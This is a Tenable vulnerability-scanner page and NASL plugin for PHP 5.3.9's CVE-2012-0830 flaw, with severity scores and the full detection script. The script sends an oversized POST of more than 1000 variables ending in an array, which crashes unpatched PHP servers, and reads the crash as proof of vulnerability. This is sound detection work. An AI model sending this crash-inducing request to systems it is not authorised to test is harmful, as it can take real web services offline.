PHP 5.3.9 'php_register_variable_ex()' Code Execution (intrusive check)

2012-02-2000:00:00

www.tenable.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.888

Percentile

98.8%

JSON

The remote host is running a version of PHP that is affected by an arbitrary code execution vulnerability.

Specifically, the fix for the hash collision denial of service vulnerability (CVE-2011-4885) introduces a remote code execution vulnerability in the function ‘php_register_variable_ex()’ in the file ‘php_variables.c’. A new configuration variable, ‘max_input_vars’, was added as a part of the fix. If the number of input variables exceeds this value and the variable being processed is an array, code execution can occur.

Note that this script assumes the ‘max_input_vars’ parameter is set to the default value of 1000, and only runs if ‘Report paranoia’ is set to ‘Paranoid’, and ‘Enable CGI scanning’ is checked.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(58039);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-0830");
  script_bugtraq_id(51830);

  script_name(english:"PHP 5.3.9 'php_register_variable_ex()' Code Execution (intrusive check)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server uses a version of PHP that is affected by a code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of PHP that is affected by an
arbitrary code execution vulnerability.

Specifically, the fix for the hash collision denial of service
vulnerability (CVE-2011-4885) introduces a remote code execution
vulnerability in the function 'php_register_variable_ex()' in the file
'php_variables.c'. A new configuration variable, 'max_input_vars', was
added as a part of the fix. If the number of input variables exceeds
this value and the variable being processed is an array, code
execution can occur.

Note that this script assumes the 'max_input_vars' parameter is set to
the default value of 1000, and only runs if 'Report paranoia' is set
to 'Paranoid', and 'Enable CGI scanning' is checked.");
  script_set_attribute(attribute:"see_also", value:"https://gist.github.com/pilate/1725489");
  script_set_attribute(attribute:"see_also", value:"http://www.php.net/ChangeLog-5.php#5.3.10");
  # http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d1ee2de8");
  script_set_attribute(attribute:"see_also", value:"http://svn.php.net/viewvc?view=revision&revision=323007");
  script_set_attribute(attribute:"solution", value:
"Upgrade to PHP version 5.3.10 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/02/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/02/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/02/20");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.");

  script_dependencies("php_version.nasl", "webmirror.nasl");
  script_require_keys("www/PHP", "Settings/ParanoidReport");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

##
#
# generate name=value pairs for the POST request.
# value is set to empty.
#
# @param num        - number of pairs to generate
# @param array_var  - whether to append an array variable at the end
# @return   string in form of str1=&str2=&...strn=&
#
##
function gen_post_strs(num,array_var)
{
  local_var i, s;

  s = NULL; for(i = 0; i < num; i++) s+= i + '=&';

  # append an array variable
  if(array_var) s +='arr_name[]=arr_val';
  else          s +='plain__var=var_val';

  return s;
}

#
# MAIN
#

port = get_http_port(default:80,php:TRUE);


#
# checking for lack of response may not be reliable, so run
# the script in paranoid mode.
#
if (report_paranoia < 2) audit(AUDIT_PARANOID);


#
# get a list of php files
#
php_files = get_kb_list('www/' + port + '/content/extensions/php');
if (isnull(php_files)) exit(0, 'No PHP files were found on the web server on port '+port+'.');
php_files = make_list(php_files);

# the default value for 'max_input_vars' in php.ini is 1000
MAX_INPUT_VARS = 1000;

good_data = gen_post_strs(num:MAX_INPUT_VARS+1, array_var:FALSE);
bad_data = gen_post_strs(num:MAX_INPUT_VARS+1, array_var:TRUE);

# prevent sending HTTP GET /
http_disable_keep_alive();

#
# find a php file that will respond to a long POST
#
count = 0;
found = 0;
foreach url (php_files)
{
  res = http_send_recv3(port:port, item: url, method:'POST', data:good_data,
                         content_type:'application/x-www-form-urlencoded', exit_on_fail:FALSE);

  # dead PHP links found by webmirror.nasl are not suitable for testing
  if(! isnull(res) && res[0] =~ "^HTTP/[0-9.]+ +200")
  {
    found = 1;
    break;
  }

  # try up to 30 php files;
  # no need to test more files as IDS/IPS/firewall might have blocked
  # POST requests with a long list of string=& pairs.
  if(count++ >= 30) break;
}

if(! found)
  exit(1,'Cannot find a suitable PHP test file on the server running on port '+port+'.'+
         '\nLong POST requests may have been blocked.');


res = http_send_recv3(port:port, item: url, method:'POST', data:bad_data,
                       content_type:'application/x-www-form-urlencoded',exit_on_fail:FALSE);



#
# vulnerable server returns either no response or error response.
#
if (
  isnull(res) ||                # Apache httpd (Unix) produces Seg Fault, httpd dies and does not respond.
  res[0] =~ "^HTTP/[0-9.]+ +500" # IIS 7, php-cgi.exe dies and "HTTP 500" is returned.
)
{
  security_hole(port:port);
  exit(0);
}
#
# 1. PHP versions that do not support 'max_input_vars'.
# 2. PHP version 5.3.10 or later (patched)
# 3. vulnerable version with 'max_input_vars' > 1000
#
else
{
  if( res[0] =~ "^HTTP/[0-9.]+ +200")
  {
    exit(0, 'The PHP version used by the web server listening on port '+port+' is not affected '+
            'or its \'max_input_vars\' configuration parameter is greater than the default value '+MAX_INPUT_VARS+'.');

  }
  else exit(1, 'The web server listening on port '+port+' returned an unexpected response.');
}